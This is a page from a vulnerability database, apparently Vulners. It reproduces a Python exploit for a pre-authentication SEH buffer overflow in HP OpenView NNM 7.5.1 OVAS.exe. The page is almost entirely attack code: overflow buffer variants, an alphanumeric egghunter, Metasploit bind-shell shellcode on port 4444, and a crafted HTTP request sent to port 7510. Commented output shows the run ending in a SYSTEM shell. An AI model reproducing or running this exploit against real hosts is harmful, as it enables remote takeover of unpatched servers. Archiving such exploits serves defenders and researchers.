Vulners
Lucene search
HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit
#!/usr/bin/python
################################################################################
# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow
# Tested on Windows 2003 Server SP1.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt
# [shameless plug]
# This vulnerability was found, analysed and exploited
# as part of a training module in "BackTrack to the Max".
# http://www.offensive-security.com/ilt.php
# [/shameless plug]
#################################################################################
# bt 0day# python hp-nnm-ov.py
# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil HTTP request to NNMz, ph33r
# [*] Egghunter working ...
# [*] Check payload results - may take up to a minute.
# bt 0day# nc -v 192.168.1.111 4444
# (muts) [192.168.1.111] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\>whoami
# whoami
# nt authority\system
#
# C:\>
#
################################################################################
# Insane, "We own all those registers, but how the heck do we get EIP" method.
################################################################################
# crash = "T"*1300
#
#################################################################################
# Funky, "Lets make the stack happy and pray for EIP" overwrite method.
#################################################################################
# Case 1 - Stack not happy:
# crash = "T"*989
#
# Case 2 - Stack happy, we own EIP - blessed by the angels above:
# 0x44442638 - Happy NNM address
# crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510"
# 12 bytes of nasty strict alphanum shellcode possibility @EBP
#
################################################################################
# Unknown "wtf, these bytes are expanding" SEH method:
################################################################################
# 0x6d356c6e - POP POP RET somewhere in NNM
# crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510"
#
################################################################################
# Final exploit crash SEH method:
################################################################################
# crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510"
#
################################################################################
import socket
import os
import sys
print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)"
print "[*] http://www.offensive-security.com"
# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r
# One egg to rule them all.
egghunter=(
"%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J"
"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5"
"21*-q!au-q!au-oGSePAA%JMNU%521*-D"
"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1"
"z1E-oRHEPAA%JMNU%521*-3s1--331--^"
"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA"
"A%JMNU%521*-R222-1111-nZJ2PAA%JMN"
"U%521*-1-wD-1-wD-8$GwP")
alignstack="\x90"*34+"\x83\xc4\x03"
# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Spawned shell dies quickly as a result of a parent thread killing it.
# Best shellcodes are of the "instant" type, such as adduser, etc.
bindshell=("T00WT00W" + alignstack +
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d"
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36"
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57"
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44"
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31"
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a"
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51"
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56"
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32"
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56"
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")
# 0x6d356c6e pop pot ret somehwere in NNM 7.5.1
evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510"
buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
buffer+="Content-Length: 1048580\r\n\r\n"
buffer+= bindshell
print "[*] Sending evil HTTP request to NNMz, ph33r"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("192.168.1.111", 7510))
expl.send(buffer)
expl.close()
print "[*] Egghunter working ..."
print "[*] Check payload results - may take up to a minute."
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Apr 2008 00:00Current
7.1High risk
Vulners AI Score7.1